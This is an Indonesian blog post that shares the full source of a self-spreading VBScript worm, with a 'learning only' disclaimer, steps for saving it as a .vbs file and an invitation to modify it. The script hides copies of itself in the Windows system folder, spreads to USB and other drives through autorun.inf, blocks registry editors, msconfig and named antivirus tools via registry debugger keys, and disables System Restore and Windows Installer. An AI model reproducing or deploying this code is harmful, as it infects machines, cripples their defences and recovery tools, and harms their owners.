"gunakan script ini hanya untuk tujuan pembelajaran. Bukan untuk merusak, bila anda ingin melihat kemampuannya, silahkan aktifkan di komputer anda sendiri. Jangan di komputer orang lain. Saya tidak bertanggung jawab atas kerusakan yang di buat oleh virus ini."
Pertama-tama buka notepad, kemudian copas (copy-paste) script di bawah ini kedalam notepad, kemudian simpan dengan format vhck3d.vbs dimulai dari on error resume next
-------------------------script begin--------------------------
On error resume next
Dim dini,jatiya,i,loph,you,mf,isi,tf,vhck3d,nt,check,sd
'Siapkan isi autorun atau bahasa kerennya make the autorun
Isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe vhck3d.vbs"
Set you = createobject("scripting.filesystemobject")
Set mf = you.getfile(wscript.scriptfullname)
Dim text,size
Size = mf.size
Check = mf.drive.drivetype
Set text = mf.openastextstream(1,-2)
Do while not text.atendofstream
Dini = dini & text.readline
Dini = dini & vbcrlf
Loop
Do
'Buat file induk bahasa coolnya prepare the mother
Set i = you.getspecialfolder(0)
Set jatiya = you.getspecialfolder(1)
Set tf = you.getfile(jatiya & "hck3d.vbs")
Tf.attributes = 32
Set tf = you.createtextfile(jatiya & "hck3d.vbs",2,true)
Tf.write dini
Tf.close
Set tf = you.getfile(jatiya & "hck3d.vbs")
Tf.attributes = 39
'Sebar ke removable disc ditambahkan dengan autorun.inf ini saya mah gak tau bahasa inggrisnya
For each loph in you.drives
If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> "a:" then
Set tf=you.getfile(loph.path &"vhck3d.sys.vbs")
Tf.attributes =32
Set tf=you.createtextfile(loph.path &"vhck3d.vbs",2,true)
Tf.write dini
Tf.close
Set tf=you.getfile(loph.path &"vhck3d.vbs")
Tf.attributes = 39
Set tf =you.getfile(loph.path &"autorun.inf")
Tf.attributes = 32
Set tf=you.createtextfile(loph.path &"autorun.inf",2,true)
Tf.write isi
Tf.close
Set tf = you.getfile(loph.path &"autorun.inf")
Tf.attributes=39
End if
Next
'Manipulasi registry
Set vhck3d = createobject("wscript.shell")
'Sudah Terlihat Jelas , Virus Ini Bermain Regedit Kita
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsmsconfig.exedebugger",""
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsregedit.exedebugger",""
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsregedt32.exedebugger",""
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsregistryeditor.exedebugger",""
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionssetup.exedebugger",""
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsavscan.exedebugger",""
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsavcenter.exedebugger",""
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsashavast.exedebugger",""
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsansav.exedebugger",""
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsviremoval.exedebugger",""
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionsviremover.exedebugger",""
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindows ntcurrentversionimage file execution optionspcmav-cln.exe.exedebugger",""
Vhck3d.regwrite "hkey_local_machinesoftwaremicrosoftwindowscurrentversionwinlogonlegalnoticecaption", "my loph dini"
Vhck3d.regwrite "hkey_local_machinesoftwarepoliciesmicrosoftwindowsinstallerlimitsystemrestorecheckpointing", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machinesoftwarepoliciesmicrosoftwindowsinstallerdisablemsi", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machinesoftwarepoliciesmicrosoftwindows ntsystemrestoredisablesr", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machinesoftwarepoliciesmicrosoftwindows ntsystemrestoredisableconfig", "1", "reg_dword"
If check <> 1 then
Wscript.sleep 200000
End if
Loop while check <> 1
Set sd = createobject("wscript.shell")
Sd.run i & "explorer.exe /e,/select, " & wscript.scriptfullname
-----------------------end script-----------------------------
Nah itu script untuk yang pertama dan bisa Anda modifikasi sendiri
1 comments:
Fungsinya apa gan?
Post a Comment